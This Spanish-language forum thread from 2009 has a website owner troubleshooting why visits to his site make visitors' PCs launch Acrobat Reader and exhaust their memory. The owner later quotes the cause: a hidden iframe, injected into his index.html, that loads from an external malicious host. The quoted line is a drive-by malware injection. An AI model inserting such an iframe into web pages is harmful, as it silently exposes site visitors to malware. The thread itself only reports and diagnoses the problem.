Google Búsqueda personalizada

Regístrate gratis para participar de los foros, o si ya estás registrado haz login.

Virus o ke es??? Falla Hosting

comentario del autor Jue May 28, 2009 9:00 pm

A ver, mi problema esta medio chusco... tengo una pagina web www.centralpc.com.mx, weno, en varias makinas ke he probado me pasa lo siguien, iniciemos con mi makina. En mi makina navego y u uso sofwares constantemente y todo bien, siempre estoy atento a los recursos ke konsumen mis aplicaciones, al navegar, excelente con mi ADSL 2 Mgs, pero al entrar a la pagina www.centralpc.com.mx ke es mi hosting la makina se alenta hasta trabarse, al entrar a dicha url con ctr+alt+supr / recusos. puedo notar que el consumo de memoria va en aumento, osea, si normalmente mi makina tenia consimido 305 mg de 2 gb de ram ke tiene mi makina, este empieza a marcar 350, 400 , 600, 900, 1.2, 1.6, 2.1, 3.3 gb y zas, se inhibe, claro cuando esta haciendo esto la makina esta casi inhibida.

Me percate que al entrar a esa pagina se carga un proceso llamado acrobat.exe (claro ke se cual es el acrobat.exe), pero este no es el original ya que si entro a la pagina de centralpc.com.mx y entro al task panel y finalizo el proceso acrobat.exe el problema se kita, cierro IE y vuelvo a entrar a centralpc.com.mx y de nuez lo mismo. Total yo c que asi lo resuelvo, pero mis clientes no!!!, ahora si mis preguntas...

1.- Sera un virus??? cabe destacar que el hosting esta sobre linux con apache y PHP5.

2.- El proceso acrobat.exe es externo o simplemente algun apyware o malware o trojan esta ejecutando el original con parametros para alentar mi makina consimiendo indiscriminadamente la memoria.

3.- Que puedo hacer para solucionarlo ???, la compañia de hosting dice que su servidor no es el problema, pero!!! si no es el problema ? porke en muchas makinas de mis clientes les pasa lo mismo???

Anexo imagen para ke vea a ke me riefo... Perdon no supe como poner una imagen Sad LOL
[img][/img]

falla.png  (69.58 KB)

falla.png

Falla de hosting

centralpc

asistió a la solución Jue May 28, 2009 11:49 pm

Te comento que hice una prueba y también saltó el mismo problema, sólo que esta vez para arreglar el exceso de consumo en RAM finalizé el proceso AcroRd32.exe, del Adobe Acrobat Reader.

1- Así rápidamente no me parece que sea virus en tu máquina, ya que también da el mismo problema en las PCs de los clientes.

2- Es un proceso de Adobe, aunque puede ser un malware si hay un duplicado en otra ubicación o el original fue reemplazado.

3- Lo mejor para sacarte las dudas es que esperes a ver que dicen los expertos de Diseño Web.

Jjn

asistió a la solución Vie May 29, 2009 5:38 am

si se inicia el reader debe ser porque incluiste pdfs en el sitio, revisá ese tema. una opción es forzar la descarga de los pdfs con un htaaccess para que nunca se abran desde el navegador

la otra causa para que una web te consuma mucha memoria es que hay algo en la programación que no está bien, generalmente algún javascript.

te puede ayudar el plugin YSLOW para firefox (requiere también el plugin firebug) para detectar el problema

natiluv

comentario del autor Vie May 29, 2009 1:30 pm

Problema resuel, muchas gracias a los ke me ayudaron, me comentaron de un maleware y era eso

<body><iframe src="http://namebuyfilmlife.cn:8080/ts/in.cgi?pepsi20" width=12 height=12 style="visibility: hidden"></iframe>
<table width="967" border="4" align="center" cellpadding="0" cellspacing="0">

este codigo se autoinserto en mi Index.Html y es lo ke hacia el problema

saludos a todos...

centralpc

Hacer una pregunta

Boletín de Noticias

Reciba noticias de tecnología, tips de reparación y ofertas exclusivas.

Reglamento / P+F

Foros

Miembros / Expertos